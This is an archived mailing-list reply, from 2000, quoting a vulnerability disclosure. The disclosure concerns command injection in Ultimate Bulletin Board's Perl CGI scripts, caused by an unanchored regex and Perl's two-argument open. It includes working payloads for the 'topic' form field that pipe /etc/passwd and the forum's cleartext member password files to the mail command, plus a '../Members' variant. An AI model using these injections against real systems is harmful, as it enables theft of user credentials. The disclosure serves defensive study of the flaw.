It works on the full version also...
Little different syntax:
topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]|
(note the ../ on the Members. You have to go up a directory to get the
file. Maybe you could stop it via simple folder permissions??)
Regards,
Kevin Hillabolt
----- Original Message -----
From: "Sergei A. Golubchik" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.
> Hello.
>
> Writing cgi scripts in perl is simple. It's also rather safe,
> providing authors follow very simple instructions. But they don't.
>
> Browsing some site, I found that their forums were based not on home-
> made scripts, but rather commercial software product. Hey, said I to
> myself, remember those story about pcweek hack ? They use commercial
> package photoads. Let's look what that Ultimate Bulletin Board by
> Infopop is.
>
> I grabbed freeware version from http://www.ultimatebb.com and
> after 10-minutes grepping found those lines:
>
> ubb_library.pl:901-902
> if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
> open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
>
> (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
> writing it ? Girls ?)
>
> And the $ThreadFile takes its value directly from the hidden (hmm!)
> field `topic'.
>
> So when I filled the form with
> topic='012345.ubb|mail [EMAIL PROTECTED] </etc/passwd|'
> It happily gives me /etc/passwd. And
> topic='012345.ubb|cat Members/*|mail [EMAIL PROTECTED]|'
> shows all users of bulletin board, and their passwords too (in
cleartext!).
>
> So one should only open "reply" form in the forum, save it to disk,
> and set topic field to whatever he want. And this stupid UBB (at least
> freeware version) doesn't keep the logs (unless, so-called, hacklog,
> used when the condition above is not met).
>
> The fix is obvious. But the rule of the thumb is "do not use magic perl
open".
> At least in cgi scripts. If you want to open regular file, sysopen does
> the trick as well.
>
> And again: CHECK EVERYTHING!
>
> Regards,
> SerG.
>
> P.S. Vendor was notified.
>
>
